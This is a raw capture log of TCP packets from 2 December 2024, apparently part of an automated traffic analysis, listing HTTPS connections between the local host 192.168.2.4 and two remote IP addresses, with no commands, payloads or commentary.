                                                          Dec 2, 2024 17:56:01.246763945 CET49772443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:56:01.246815920 CET443497724.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:56:01.246896029 CET49772443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:56:01.247378111 CET49772443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:56:01.247390032 CET443497724.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:56:02.826802969 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:02.826853991 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:02.826947927 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:02.827361107 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:02.827373981 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:03.006402969 CET443497724.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:56:03.006570101 CET49772443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:56:03.013356924 CET49772443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:56:03.013365984 CET443497724.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:56:03.013602018 CET443497724.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:56:03.028892994 CET49772443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:56:03.075325966 CET443497724.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:56:03.707950115 CET443497724.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:56:03.707990885 CET443497724.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:56:03.708005905 CET443497724.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:56:03.708420992 CET49772443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:56:03.708441973 CET443497724.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:56:03.708524942 CET49772443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:56:03.747036934 CET443497724.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:56:03.747093916 CET443497724.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:56:03.747175932 CET49772443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:56:03.747179031 CET443497724.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:56:03.747405052 CET49772443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:56:03.747627974 CET49772443192.168.2.44.175.87.197
                                                          Dec 2, 2024 17:56:03.747644901 CET443497724.175.87.197192.168.2.4
                                                          Dec 2, 2024 17:56:04.613504887 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:04.613648891 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:04.618594885 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:04.618606091 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:04.618866920 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:04.631066084 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:04.675335884 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.102880001 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.102926970 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.102978945 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.103080988 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.103097916 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.103215933 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.293492079 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.293530941 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.293761015 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.293773890 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.293828964 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.337352991 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.337383032 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.337496996 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.337518930 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.337574005 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.477283001 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.477307081 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.477457047 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.477474928 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.477606058 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.514221907 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.514240026 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.514497995 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.514508963 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.514586926 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.537278891 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.537293911 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.537408113 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.537415981 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.537512064 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.554039001 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.554054976 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.554172039 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.554178953 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.554292917 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.677350044 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.677370071 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.677469015 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.677475929 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.677536011 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.695167065 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.695205927 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.695296049 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.695327997 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.695389986 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.712677002 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.712697983 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.712812901 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.712824106 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.712907076 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.727857113 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.727873087 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.728060007 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.728068113 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.728199005 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.744142056 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.744163990 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.744281054 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.744288921 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.744376898 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.869219065 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.869242907 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.869364023 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.869373083 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.869431973 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.873558044 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.873626947 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.873634100 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.873680115 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.873718023 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.873733997 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.873743057 CET49773443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.873749018 CET4434977313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.916970968 CET49775443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.916997910 CET4434977513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.916996002 CET49774443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.917047977 CET4434977413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.917073011 CET49775443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.917099953 CET49774443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.917300940 CET49775443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.917311907 CET4434977513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.917391062 CET49774443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.917407036 CET4434977413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.918618917 CET49776443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.918651104 CET4434977613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.918699026 CET49776443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.918859005 CET49776443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.918873072 CET4434977613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.919717073 CET49777443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.919747114 CET4434977713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.919790983 CET49777443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.919928074 CET49777443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.919939041 CET4434977713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.920526028 CET49778443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.920532942 CET4434977813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:05.920586109 CET49778443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.920686960 CET49778443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:05.920696974 CET4434977813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:07.682317019 CET4434977713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:07.682823896 CET49777443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:07.682852030 CET4434977713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:07.683309078 CET49777443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:07.683317900 CET4434977713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:07.705089092 CET4434977413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:07.705359936 CET49774443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:07.705384016 CET4434977413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:07.705683947 CET49774443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:07.705688000 CET4434977413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:07.717036963 CET4434977513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:07.717633009 CET49775443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:07.717654943 CET4434977513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:07.718024015 CET49775443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:07.718031883 CET4434977513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:07.718297005 CET4434977613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:07.718529940 CET49776443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:07.718553066 CET4434977613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:07.718652010 CET4434977813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:07.718863010 CET49776443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:07.718869925 CET4434977613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:07.719053030 CET49778443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:07.719059944 CET4434977813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:07.719393969 CET49778443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:07.719404936 CET4434977813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.118102074 CET4434977713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.118189096 CET4434977713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.118483067 CET49777443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.118896961 CET49777443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.118916988 CET4434977713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.118936062 CET49777443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.118941069 CET4434977713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.124387026 CET49779443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.124412060 CET4434977913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.124564886 CET49779443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.124830008 CET49779443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.124839067 CET4434977913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.157047033 CET4434977413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.157068968 CET4434977413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.157116890 CET4434977413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.157186031 CET49774443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.157308102 CET49774443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.157790899 CET49774443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.157818079 CET4434977413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.157839060 CET49774443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.157845974 CET4434977413.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.162847042 CET49780443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.162885904 CET4434978013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.163022041 CET49780443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.163366079 CET49780443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.163382053 CET4434978013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.164933920 CET4434977513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.165018082 CET4434977513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.165086985 CET49775443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.165357113 CET49775443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.165369987 CET4434977513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.165384054 CET49775443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.165389061 CET4434977513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.167773008 CET4434977613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.167797089 CET4434977613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.167912006 CET49776443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.167937994 CET4434977613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.168020964 CET49776443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.168029070 CET4434977813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.168075085 CET4434977813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.168144941 CET49778443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.168155909 CET4434977813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.168260098 CET49778443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.168278933 CET4434977813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.168292046 CET49778443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.168672085 CET4434977813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.168775082 CET49776443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.168782949 CET4434977613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.168796062 CET4434977813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.168890953 CET49778443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.168939114 CET4434977613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.168968916 CET4434977613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.169042110 CET49776443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.169390917 CET49781443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.169403076 CET49776443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.169418097 CET4434977613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.169439077 CET4434978113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.169550896 CET49781443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.169629097 CET49781443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.169641972 CET4434978113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.171204090 CET49782443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.171224117 CET4434978213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.171298981 CET49782443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.171421051 CET49782443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.171431065 CET4434978213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.171454906 CET49783443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.171472073 CET4434978313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:08.171530008 CET49783443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.171653986 CET49783443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:08.171669960 CET4434978313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:09.928838015 CET4434978313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:09.929388046 CET49783443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:09.929416895 CET4434978313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:09.929860115 CET49783443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:09.929866076 CET4434978313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.010668039 CET4434977913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.011018991 CET49779443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.011053085 CET4434977913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.011377096 CET49779443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.011384964 CET4434977913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.053458929 CET4434978213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.053843021 CET49782443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.053868055 CET4434978213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.054092884 CET49782443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.054100990 CET4434978213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.054286957 CET4434978113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.054521084 CET49781443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.054534912 CET4434978113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.054821968 CET49781443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.054826975 CET4434978113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.097151041 CET4434978013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.097472906 CET49780443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.097491026 CET4434978013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.097824097 CET49780443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.097829103 CET4434978013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.365464926 CET4434978313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.365537882 CET4434978313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.365586996 CET49783443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.365762949 CET49783443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.365786076 CET4434978313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.365798950 CET49783443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.365806103 CET4434978313.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.368185043 CET49785443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.368228912 CET4434978513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.368311882 CET49785443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.368442059 CET49785443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.368462086 CET4434978513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.455945015 CET4434977913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.456001997 CET4434977913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.456226110 CET49779443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.456850052 CET49779443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.456850052 CET49779443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.456877947 CET4434977913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.456891060 CET4434977913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.459729910 CET49786443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.459759951 CET4434978613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.459904909 CET49786443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.459995985 CET49786443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.460011005 CET4434978613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.507595062 CET4434978213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.507666111 CET4434978213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.508182049 CET49782443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.508218050 CET49782443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.508233070 CET4434978213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.508291960 CET49782443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.508296967 CET4434978213.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.508732080 CET4434978113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.508800030 CET4434978113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.508867979 CET49781443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.509171963 CET49781443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.509191036 CET4434978113.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.512300014 CET49787443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.512346983 CET4434978713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.512427092 CET49788443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.512465954 CET4434978813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.512511015 CET49787443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.512584925 CET49788443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.512612104 CET49787443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.512629032 CET4434978713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.513025045 CET49788443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.513037920 CET4434978813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.565778017 CET4434978013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.565845966 CET4434978013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.566004038 CET49780443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.566473961 CET49780443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.566483974 CET4434978013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.566549063 CET49780443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.566555023 CET4434978013.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.572427034 CET49789443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.572457075 CET4434978913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:10.572563887 CET49789443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.573003054 CET49789443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:10.573013067 CET4434978913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.162062883 CET4434978513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.162548065 CET49785443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.162564039 CET4434978513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.163033009 CET49785443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.163037062 CET4434978513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.307111025 CET4434978813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.307605982 CET49788443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.307635069 CET4434978813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.308058023 CET49788443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.308067083 CET4434978813.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.313740015 CET4434978713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.313992023 CET49787443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.314013004 CET4434978713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.314315081 CET49787443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.314317942 CET4434978713.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.323149920 CET4434978613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.323371887 CET49786443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.323399067 CET4434978613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.323685884 CET49786443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.323692083 CET4434978613.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.357558012 CET4434978913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.357887030 CET49789443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.357909918 CET4434978913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.358190060 CET49789443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.358194113 CET4434978913.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.608141899 CET4434978513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.608206034 CET4434978513.107.246.63192.168.2.4
                                                          Dec 2, 2024 17:56:12.608263016 CET49785443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.608469963 CET49785443192.168.2.413.107.246.63
                                                          Dec 2, 2024 17:56:12.608489990 CET4434978513.107.246.63192.168.2.4
